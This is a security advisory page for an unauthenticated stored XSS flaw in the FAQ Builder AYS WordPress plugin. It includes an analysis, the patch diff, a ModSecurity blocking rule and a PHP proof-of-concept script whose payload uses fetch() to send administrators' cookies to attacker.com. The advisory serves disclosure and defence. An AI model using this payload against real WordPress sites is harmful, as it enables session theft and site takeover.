What is CVE-2026-25346?

CVE-2026-25346 is a high-severity vulnerability in the FAQ Builder AYS plugin for WordPress, specifically versions up to and including 1.8.2. It allows unauthenticated attackers to exploit stored Cross-Site Scripting (XSS) due to insufficient input sanitization, enabling them to inject malicious scripts that execute in the context of an authenticated administrator’s session.

Who is affected by this vulnerability?

WordPress administrators using the FAQ Builder AYS plugin version 1.8.2 or earlier are at risk. To check if you are affected, verify the plugin version in your WordPress installation and ensure it is not older than version 1.8.3.

How does the vulnerability work?

The vulnerability resides in the AJAX handler for deactivating upgrade prompts, where the plugin directly accesses user input without proper authentication or sanitization. An attacker can send a POST request with a malicious payload, which is then stored in the WordPress database and executed when an administrator accesses the relevant settings page.

What are the potential risks of this vulnerability?

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an administrator’s session. This can lead to session hijacking, site defacement, installation of backdoors, and other malicious activities, posing a significant risk to the integrity and security of the WordPress site.

How can I fix this vulnerability?

To mitigate this vulnerability, update the FAQ Builder AYS plugin to version 1.8.3 or later, which includes security enhancements such as nonce verification, permission checks, and proper input sanitization. Regularly check for updates to ensure your plugins are secure.

What does a CVSS score of 7.2 mean?

A CVSS score of 7.2 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. In practical terms, it means that the vulnerability can be exploited easily and could lead to serious consequences for the security of the WordPress site.

What is stored Cross-Site Scripting (XSS)?

Stored Cross-Site Scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then stored on the server and executed in the browsers of users who access the affected pages. This type of vulnerability can persist over time, affecting multiple users.

How can I check if my site is vulnerable?

To check if your site is vulnerable, review the version of the FAQ Builder AYS plugin you are using. If it is version 1.8.2 or earlier, your site is at risk. Additionally, look for any signs of unauthorized scripts or changes in your site’s behavior.

What is a proof of concept (PoC) in this context?

A proof of concept (PoC) is a demonstration that illustrates how the vulnerability can be exploited. In this case, a PoC script shows how an attacker can send a malicious payload to the vulnerable endpoint, resulting in stored XSS that executes when an administrator accesses the affected settings page.

What security measures were implemented in the patched version?

The patched version 1.8.3 includes several security measures such as nonce verification to prevent unauthorized access, capability checks to ensure only administrators can execute certain actions, and input sanitization to prevent malicious data from being stored.

How can I protect my WordPress site from similar vulnerabilities?

To protect your WordPress site, regularly update all plugins and themes, implement security plugins that monitor for vulnerabilities, and conduct routine security audits. Educate yourself and your team about common vulnerabilities and how to mitigate them.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately update all plugins and themes, change your passwords, and review user accounts for unauthorized access. Consider restoring from a clean backup and scanning your site for malware.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 1, 2026

CVE-2026-25346: FAQ Builder AYS <= 1.8.2 – Unauthenticated Stored Cross-Site Scripting (faq-builder-ays)

CVE ID CVE-2026-25346

Plugin faq-builder-ays

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 1.8.2

Patched Version 1.8.3

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25346:
The FAQ Builder AYS WordPress plugin version 1.8.2 and earlier contains an unauthenticated stored cross-site scripting vulnerability. The vulnerability resides in the plugin’s AJAX handler for deactivating upgrade prompts, allowing attackers to inject malicious scripts that execute in the context of an authenticated administrator’s session. The CVSS score of 7.2 reflects the high impact of stored XSS in a WordPress admin context.

The root cause is insufficient security controls in the `deactivate_plugin_option()` function within `/faq-builder-ays/admin/class-faq-builder-ays-admin.php`. The function directly accessed the `$_REQUEST[‘upgrade_plugin’]` parameter without proper authentication checks, input sanitization, or output escaping. The function also lacked a nonce verification mechanism, making it accessible to unauthenticated users. The vulnerable code path starts when WordPress routes AJAX requests to `admin-ajax.php` with the action parameter set to trigger this function.

Exploitation occurs via a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter targeting the vulnerable function. The attacker sends a malicious payload in the `upgrade_plugin` parameter. Since no authentication or nonce verification exists in version 1.8.2, unauthenticated users can directly call this endpoint. The payload is stored in the WordPress database via the `update_option()` function and later retrieved and rendered without proper output escaping, causing script execution when administrators view plugin settings pages.

The patch in version 1.8.3 adds multiple security layers. It introduces a nonce check via `check_ajax_referer()` using the `faq-builder-ajax-deactivate-plugin-nonce` nonce. The patch adds a capability check with `current_user_can(‘manage_options’)` to restrict access to administrators. It implements input sanitization using `sanitize_text_field()` and database escaping with `esc_sql()`. The patch also adds an `is_user_logged_in()` check before processing the request. These changes collectively prevent unauthenticated access and ensure proper data handling.

Successful exploitation allows attackers to inject arbitrary JavaScript that executes in the WordPress administrator’s context. This enables session hijacking, site defacement, backdoor installation, and privilege escalation. Attackers can create new administrator accounts, modify plugin settings, or redirect users to malicious sites. The stored nature means the payload persists and executes each time an administrator accesses affected pages, creating a persistent threat.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/faq-builder-ays/admin/class-faq-builder-ays-admin.php
+++ b/faq-builder-ays/admin/class-faq-builder-ays-admin.php
@@ -240,15 +240,20 @@
     }

     public function add_action_links($links){
+
         /*
         *  Documentation : https://codex.wordpress.org/Plugin_API/Filter_Reference/plugin_action_links_(plugin_file_name)
         */
+
+        $faq_ajax_deactivate_plugin_nonce = wp_create_nonce( 'faq-builder-ajax-deactivate-plugin-nonce' );
+
         $text = esc_html__('Settings', 'faq-builder-ays');
         $settings_link = array(
             '<a href="' . admin_url('admin.php?page=' . $this->plugin_name) . '">' . $text . '</a>',
             '<a href="https://plugins.ays-demo.com/faq-builder-free-demo/" target="_blank">' . esc_html__('Demo', 'faq-builder-ays') . '</a>',
             '<a href="https://ays-pro.com/wordpress/faq-builder/" target="_blank" style="color:#01A32A;font-weight:bold;">' . esc_html__('Upgrade 30% Sale', 'faq-builder-ays') . '</a>',
-            );
+            '<input type="hidden" id="ays_faq_ajax_deactivate_plugin_nonce" name="ays_faq_ajax_deactivate_plugin_nonce" value="' . $faq_ajax_deactivate_plugin_nonce .'">',
+        );
         return array_merge($settings_link, $links);

     }
@@ -443,15 +448,43 @@
     }

     public function deactivate_plugin_option(){
-        $request_value = $_REQUEST['upgrade_plugin'];
-        $upgrade_option = get_option('faq_ays_upgrade_plugin','');
-        if($upgrade_option === ''){
-            add_option('faq_ays_upgrade_plugin',$request_value);
-        }else{
-            update_option('faq_ays_upgrade_plugin',$request_value);
+
+        // Run a security check.
+        check_ajax_referer( 'faq-builder-ajax-deactivate-plugin-nonce', sanitize_key( $_REQUEST['_ajax_nonce'] ) );
+
+        // Check for permissions.
+        if ( ! current_user_can( 'manage_options' ) ) {
+            ob_end_clean();
+            $ob_get_clean = ob_get_clean();
+            echo json_encode(array(
+                'option' => ''
+            ));
+            wp_die();
         }
-        echo json_encode(array('option'=>get_option('faq_ays_upgrade_plugin','')));
-        wp_die();
+
+        if( is_user_logged_in() ) {
+            $request_value = esc_sql( sanitize_text_field( $_REQUEST['upgrade_plugin'] ) );
+            $upgrade_option = get_option('faq_ays_upgrade_plugin','');
+            if($upgrade_option === ''){
+                add_option('faq_ays_upgrade_plugin',$request_value);
+            }else{
+                update_option('faq_ays_upgrade_plugin',$request_value);
+            }
+            ob_end_clean();
+            $ob_get_clean = ob_get_clean();
+            echo json_encode(array(
+                'option' => get_option('faq_ays_upgrade_plugin', '')
+            ));
+            wp_die();
+        } else {
+            ob_end_clean();
+            $ob_get_clean = ob_get_clean();
+            echo json_encode(array(
+                'option' => ''
+            ));
+            wp_die();
+        }
+
     }

     public static function ays_get_faq_user_question( $id ) {
--- a/faq-builder-ays/faq-builder-ays.php
+++ b/faq-builder-ays/faq-builder-ays.php
@@ -16,7 +16,7 @@
  * Plugin Name:       F.A.Q Builder
  * Plugin URI:        https://ays-pro.com
  * Description:       FAQ Builder is the best option for creating and displaying frequently asked questions on your website. It allows you to organize and present answers in a clean, accessible format for your visitors.
- * Version:           1.8.2
+ * Version:           1.8.3
  * Author:            F.A.Q Builder Team
  * Author URI:        https://ays-pro.com
  * License:           GPL-2.0+
@@ -51,7 +51,7 @@
  * Start at version 1.0.0 and use SemVer - https://semver.org
  * Rename this for your plugin and update it as you release new versions.
  */
-define( 'FAQ_VERSION', '1.8.2' );
+define( 'FAQ_VERSION', '1.8.3' );
 define( 'AYS_FAQ_NAME', 'faq-builder' );
 /**
  * The code that runs during plugin activation.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-25346
# Blocks unauthenticated XSS exploitation attempts against FAQ Builder AYS plugin <= 1.8.2
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:100025346,phase:2,deny,status:403,chain,msg:'CVE-2026-25346: Unauthenticated Stored XSS via FAQ Builder AYS AJAX',severity:'CRITICAL',tag:'CVE-2026-25346',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WordPress',tag:'Plugin/FAQ-Builder-AYS'"
  SecRule ARGS_POST:action "@streq deactivate_plugin_option" "chain"
    SecRule &ARGS_POST:_ajax_nonce "@eq 0" "chain"
      SecRule ARGS_POST:upgrade_plugin "@rx <script[^>]*>" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25346 - FAQ Builder AYS <= 1.8.2 - Unauthenticated Stored Cross-Site Scripting

<?php

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin-ajax.php';

// Malicious JavaScript payload to demonstrate XSS
// This payload creates an alert box and sends cookies to an attacker-controlled server
$xss_payload = '<script>alert("Atomic Edge XSS Test");fetch("https://attacker.com/steal?c="+document.cookie);</script>';

// Prepare POST data for the vulnerable endpoint
$post_data = array(
    'action' => 'deactivate_plugin_option',  // Triggers the vulnerable function
    'upgrade_plugin' => $xss_payload        // Unsanitized input in vulnerable version
);

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate browser request
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Accept: application/json, text/javascript, */*; q=0.01',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With: XMLHttpRequest'
));

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo "cURL Error: " . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response: $responsen";
    
    if ($http_code == 200 && strpos($response, 'option') !== false) {
        echo "[SUCCESS] XSS payload likely injected. Check the WordPress admin area for script execution.n";
        echo "The payload will execute when an administrator views plugin settings.n";
    } else {
        echo "[FAILED] Injection attempt unsuccessful. The site may be patched or have security measures.n";
    }
}

// Close cURL session
curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-25346?
Understanding the vulnerability
CVE-2026-25346 is a high-severity vulnerability in the FAQ Builder AYS plugin for WordPress, specifically versions up to and including 1.8.2. It allows unauthenticated attackers to exploit stored Cross-Site Scripting (XSS) due to insufficient input sanitization, enabling them to inject malicious scripts that execute in the context of an authenticated administrator’s session.
Who is affected by this vulnerability?
Identifying impacted users
WordPress administrators using the FAQ Builder AYS plugin version 1.8.2 or earlier are at risk. To check if you are affected, verify the plugin version in your WordPress installation and ensure it is not older than version 1.8.3.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability resides in the AJAX handler for deactivating upgrade prompts, where the plugin directly accesses user input without proper authentication or sanitization. An attacker can send a POST request with a malicious payload, which is then stored in the WordPress database and executed when an administrator accesses the relevant settings page.
What are the potential risks of this vulnerability?
Understanding the impact
Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an administrator’s session. This can lead to session hijacking, site defacement, installation of backdoors, and other malicious activities, posing a significant risk to the integrity and security of the WordPress site.
How can I fix this vulnerability?
Mitigation steps
To mitigate this vulnerability, update the FAQ Builder AYS plugin to version 1.8.3 or later, which includes security enhancements such as nonce verification, permission checks, and proper input sanitization. Regularly check for updates to ensure your plugins are secure.
What does a CVSS score of 7.2 mean?
Interpreting the severity rating
A CVSS score of 7.2 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. In practical terms, it means that the vulnerability can be exploited easily and could lead to serious consequences for the security of the WordPress site.
What is stored Cross-Site Scripting (XSS)?
Defining the attack vector
Stored Cross-Site Scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then stored on the server and executed in the browsers of users who access the affected pages. This type of vulnerability can persist over time, affecting multiple users.
How can I check if my site is vulnerable?
Assessment methods
To check if your site is vulnerable, review the version of the FAQ Builder AYS plugin you are using. If it is version 1.8.2 or earlier, your site is at risk. Additionally, look for any signs of unauthorized scripts or changes in your site’s behavior.
What is a proof of concept (PoC) in this context?
Understanding the demonstration
A proof of concept (PoC) is a demonstration that illustrates how the vulnerability can be exploited. In this case, a PoC script shows how an attacker can send a malicious payload to the vulnerable endpoint, resulting in stored XSS that executes when an administrator accesses the affected settings page.
What security measures were implemented in the patched version?
Enhancements in version 1.8.3
The patched version 1.8.3 includes several security measures such as nonce verification to prevent unauthorized access, capability checks to ensure only administrators can execute certain actions, and input sanitization to prevent malicious data from being stored.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for security
To protect your WordPress site, regularly update all plugins and themes, implement security plugins that monitor for vulnerabilities, and conduct routine security audits. Educate yourself and your team about common vulnerabilities and how to mitigate them.
What should I do if I suspect my site has been compromised?
Response actions
If you suspect your site has been compromised, immediately update all plugins and themes, change your passwords, and review user accounts for unauthorized access. Consider restoring from a clean backup and scanning your site for malware.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations